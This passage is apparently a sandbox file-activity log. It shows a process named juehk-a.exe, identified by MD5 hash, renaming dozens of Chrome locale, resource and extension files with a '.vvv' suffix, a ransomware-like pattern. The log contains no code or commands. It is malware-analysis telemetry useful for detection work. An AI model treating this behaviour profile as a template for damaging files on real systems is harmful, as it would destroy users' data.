- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fil.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fil.pak.vvv
- ads:
- fid (ads:): 1125899906927940
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188493
- repeat: 20000
- mode: close
- sequenceNumber: 2494
- value: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fr.pak
- filesize: 294206
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906927941
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188499
- mode: rename
- sequenceNumber: 2495
- filesize: 294206
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fr.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fr.pak.vvv
- ads:
- fid (ads:): 1125899906927941
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188538
- mode: rename
- sequenceNumber: 2496
- filesize: 553534
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\gu.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\gu.pak.vvv
- ads:
- fid (ads:): 1125899906927942
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188554
- mode: rename
- sequenceNumber: 2497
- filesize: 317774
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\he.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\he.pak.vvv
- ads:
- fid (ads:): 1125899906927943
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188603
- mode: rename
- sequenceNumber: 2498
- filesize: 569486
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\hi.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\hi.pak.vvv
- ads:
- fid (ads:): 1125899906927944
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188632
- mode: rename
- sequenceNumber: 2499
- filesize: 260366
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\hr.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\hr.pak.vvv
- ads:
- fid (ads:): 1125899906927945
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188648
- mode: rename
- sequenceNumber: 2500
- filesize: 291710
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\hu.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\hu.pak.vvv
- ads:
- fid (ads:): 1125899906927946
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188664
- mode: rename
- sequenceNumber: 2501
- filesize: 250750
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\id.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\id.pak.vvv
- ads:
- fid (ads:): 1125899906927947
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188681
- mode: rename
- sequenceNumber: 2502
- filesize: 271470
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\it.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\it.pak.vvv
- ads:
- fid (ads:): 1125899906927948
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188700
- mode: rename
- sequenceNumber: 2503
- filesize: 332622
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ja.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ja.pak.vvv
- ads:
- fid (ads:): 1125899906927949
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188723
- mode: rename
- sequenceNumber: 2504
- filesize: 634350
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\kn.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\kn.pak.vvv
- ads:
- fid (ads:): 1125899906927950
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188741
- mode: rename
- sequenceNumber: 2505
- filesize: 280878
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ko.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ko.pak.vvv
- ads:
- fid (ads:): 1125899906927951
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188759
- mode: rename
- sequenceNumber: 2506
- filesize: 272846
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\lt.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\lt.pak.vvv
- ads:
- fid (ads:): 1125899906927952
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188808
- mode: rename
- sequenceNumber: 2507
- filesize: 278238
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\lv.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\lv.pak.vvv
- ads:
- fid (ads:): 1125899906927953
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188834
- mode: rename
- sequenceNumber: 2508
- filesize: 734782
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ml.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ml.pak.vvv
- ads:
- fid (ads:): 1125899906927954
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188857
- mode: rename
- sequenceNumber: 2509
- filesize: 562014
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\mr.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\mr.pak.vvv
- ads:
- fid (ads:): 1125899906927955
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188897
- mode: rename
- sequenceNumber: 2510
- filesize: 207806
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ms.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ms.pak.vvv
- ads:
- fid (ads:): 1125899906927956
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188911
- mode: rename
- sequenceNumber: 2511
- filesize: 252238
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\nb.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\nb.pak.vvv
- ads:
- fid (ads:): 1125899906927957
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188929
- mode: rename
- sequenceNumber: 2512
- filesize: 269422
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\nl.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\nl.pak.vvv
- ads:
- fid (ads:): 1125899906927958
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188945
- mode: rename
- sequenceNumber: 2513
- filesize: 274318
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\pl.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\pl.pak.vvv
- ads:
- fid (ads:): 1125899906927959
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188963
- mode: rename
- sequenceNumber: 2514
- filesize: 269118
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\pt-BR.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\pt-BR.pak.vvv
- ads:
- fid (ads:): 1125899906927960
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188980
- mode: rename
- sequenceNumber: 2515
- filesize: 274222
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\pt-PT.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\pt-PT.pak.vvv
- ads:
- fid (ads:): 1125899906927961
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 189148
- mode: rename
- sequenceNumber: 2516
- filesize: 286414
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ro.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ro.pak.vvv
- ads:
- fid (ads:): 1125899906927963
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 189175
- mode: rename
- sequenceNumber: 2517
- filesize: 437406
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ru.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ru.pak.vvv
- ads:
- fid (ads:): 1125899906927964
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 189286
- mode: rename
- sequenceNumber: 2518
- filesize: 288478
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sk.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sk.pak.vvv
- ads:
- fid (ads:): 1125899906927965
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 189303
- mode: rename
- sequenceNumber: 2519
- filesize: 255550
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sl.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sl.pak.vvv
- ads:
- fid (ads:): 1125899906927966
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 189323
- mode: rename
- sequenceNumber: 2520
- filesize: 422446
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sr.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sr.pak.vvv
- ads:
- fid (ads:): 1125899906927967
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 189347
- mode: rename
- sequenceNumber: 2521
- filesize: 254670
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sv.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sv.pak.vvv
- ads:
- fid (ads:): 1125899906927968
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 189363
- mode: rename
- sequenceNumber: 2522
- filesize: 232206
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sw.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sw.pak.vvv
- ads:
- fid (ads:): 1125899906927969
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 189387
- mode: rename
- sequenceNumber: 2523
- filesize: 665358
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ta.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ta.pak.vvv
- ads:
- fid (ads:): 1125899906927970
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 189411
- mode: rename
- sequenceNumber: 2524
- filesize: 618830
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\te.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\te.pak.vvv
- ads:
- fid (ads:): 1125899906927971
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 189434
- mode: rename
- sequenceNumber: 2525
- filesize: 563742
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\th.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\th.pak.vvv
- ads:
- fid (ads:): 1125899906927972
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 189453
- mode: rename
- sequenceNumber: 2526
- filesize: 275886
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\tr.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\tr.pak.vvv
- ads:
- fid (ads:): 1125899906927973
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 189474
- mode: rename
- sequenceNumber: 2527
- filesize: 436158
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\uk.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\uk.pak.vvv
- ads:
- fid (ads:): 1125899906927974
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 189491
- mode: rename
- sequenceNumber: 2528
- filesize: 319246
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\vi.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\vi.pak.vvv
- ads:
- fid (ads:): 1125899906927975
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 189507
- mode: rename
- sequenceNumber: 2529
- filesize: 224702
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\zh-CN.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\zh-CN.pak.vvv
- ads:
- fid (ads:): 1125899906927976
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 189523
- mode: rename
- sequenceNumber: 2530
- filesize: 225950
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\zh-TW.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\zh-TW.pak.vvv
- ads:
- fid (ads:): 1125899906927977
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 190180
- mode: rename
- sequenceNumber: 2531
- filesize: 12197566
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\resources.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\resources.pak.vvv
- ads:
- fid (ads:): 1125899906927962
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 190343
- mode: rename
- sequenceNumber: 2532
- filesize: 1054
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\secondarytile.png
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\secondarytile.png.vvv
- ads:
- fid (ads:): 1125899906927979
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 190375
- mode: rename
- sequenceNumber: 2533
- filesize: 4398
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\VisualElements\logo.png
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\VisualElements\logo.png.vvv
- ads:
- fid (ads:): 1125899906927978
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 190406
- mode: rename
- sequenceNumber: 2534
- filesize: 9710
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\VisualElements\smalllogo.png
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\VisualElements\smalllogo.png.vvv
- ads:
- fid (ads:): 1407374883638636
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 190419
- mode: rename
- sequenceNumber: 2535
- filesize: 10606
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\VisualElements\splash-620x300.png
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\VisualElements\splash-620x300.png.vvv
- ads:
- fid (ads:): 1407374883638637
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 190543
- mode: rename
- sequenceNumber: 2536
- filesize: 3438
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\icon_128.png
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\icon_128.png.vvv
- ads:
- fid (ads:): 1407374883639500
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 190616
- mode: rename
- sequenceNumber: 2537
- filesize: 558
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\icon_16.png
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\icon_16.png.vvv
- ads:
- fid (ads:): 844424930218236
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 190632
- mode: rename
- sequenceNumber: 2538
- filesize: 494
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\main.js
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\main.js.vvv
- ads:
- fid (ads:): 1125899906928856
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 190711
- mode: rename
- sequenceNumber: 2539
- filesize: 8078
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.2_0\128.png
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.2_0\128.png.vvv
- ads:
- fid (ads:): 1407374883639490
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 191196
- mode: rename
- sequenceNumber: 2540
- filesize: 3950
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.5_0\128.png
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.5_0\128.png.vvv
- ads:
- fid (ads:): 1688849860350098
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 191726
- mode: rename
- sequenceNumber: 2541
- filesize: 5790
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\128.png
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\128.png.vvv
- ads:
- fid (ads:): 1407374883639496
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 191743
- mode: rename
- sequenceNumber: 2542
- filesize: 926
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\16.png
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\16.png.vvv
- ads:
- fid (ads:): 1407374883639501
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 191780
- mode: rename
- sequenceNumber: 2543
- filesize: 1566
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\32.png
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\32.png.vvv
- ads:
- fid (ads:): 2533274790482132
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 191798
- mode: rename
- sequenceNumber: 2544
- filesize: 2286
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\48.png
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\48.png.vvv
- ads:
- fid (ads:): 844424930218585
- ntstatus: 0x0
